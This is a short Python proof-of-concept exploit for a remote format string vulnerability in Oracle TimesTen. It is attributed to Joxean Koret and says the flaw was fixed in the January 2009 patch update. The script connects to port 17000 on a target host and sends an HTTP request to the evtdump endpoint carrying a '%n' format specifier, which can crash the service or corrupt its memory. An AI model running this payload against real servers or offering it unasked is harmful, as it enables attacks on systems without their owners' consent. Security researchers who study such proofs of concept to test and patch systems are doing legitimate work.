Oracle TimesTen remote format string vulnerability proof of concept exploit.
bebdb947f4e466dcc6f48b65fba9c20daffa4ee812db84d318cf6cb2c1d84eb5
#!/usr/bin/python
"""
Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009
Copyright (c) Joxean Koret 2009
"""
import sys
import socket
def testPoc(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 17000))
buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
print "Sending: %s" % buf
s.send(buf)
print s.recv(4096)
s.close()
if __name__ == "__main__":
if len(sys.argv) == 1:
print "Usage:", sys.argv[0], "<target host>"
print
sys.exit(1)
else:
testPoc(sys.argv[1])